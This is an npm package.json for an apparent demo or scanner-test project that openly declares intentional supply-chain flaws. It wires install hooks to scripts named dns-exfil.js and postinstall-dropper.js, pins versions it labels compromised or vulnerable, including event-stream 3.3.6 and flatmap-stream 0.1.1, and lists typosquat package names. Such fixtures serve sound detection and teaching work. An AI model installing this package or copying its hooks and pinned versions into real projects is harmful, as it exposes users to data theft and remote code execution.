{
  "name": "javascript-vuln-demo",
  "version": "1.0.0",
  "description": "DEMO — intentional supply-chain and runtime vulnerabilities",
  "main": "server.js",
  "scripts": {
    "preinstall": "node scripts/preinstall.js && node scripts/dns-exfil.js",
    "postinstall": "node scripts/postinstall-dropper.js",
    "start": "node server.js"
  },
  "dependencies": {
    "express":              "4.17.1",
    "lodash":               "4.17.15",
    "axios":                "0.19.2",
    "serialize-javascript": "1.7.0",
    "handlebars":           "4.5.3",
    "node-serialize":       "0.0.4",
    "ua-parser-js":         "0.7.28",
    "minimist":             "0.0.8",
    "event-stream":         "3.3.6",
    "flatmap-stream":       "0.1.1",
    "caret-trap-lib":       "^1.11.21",
    "protobufjs":           "7.4.0"
  },
  "_supply_chain_notes": {
    "semver_trap_examples": {
      "caret-trap-lib@^1.11.21": "caret range resolves to a malicious patch version after republish"
    },
    "typosquat_examples": {
      "crossenv":  "typosquat of cross-env",
      "colourama": "typosquat of colorama",
      "lodahs":    "typosquat of lodash",
      "expres":    "typosquat of express",
      "mongoos":   "typosquat of mongoose"
    },
    "stale_high_severity": {
      "event-stream@3.3.6":         "known compromised supply-chain version",
      "flatmap-stream@0.1.1":       "known malicious dependency",
      "node-serialize@0.0.4":       "RCE via deserialization",
      "ua-parser-js@0.7.28":        "CVE-2021-27292",
      "axios@0.19.2":               "CVE-2020-28168",
      "handlebars@4.5.3":           "CVE-2019-19919",
      "minimist@0.0.8":             "CVE-2021-44906",
      "serialize-javascript@1.7.0": "CVE-2020-7660",
      "protobufjs@7.4.0":           "CVE-2026-41242"
    }
  }
}
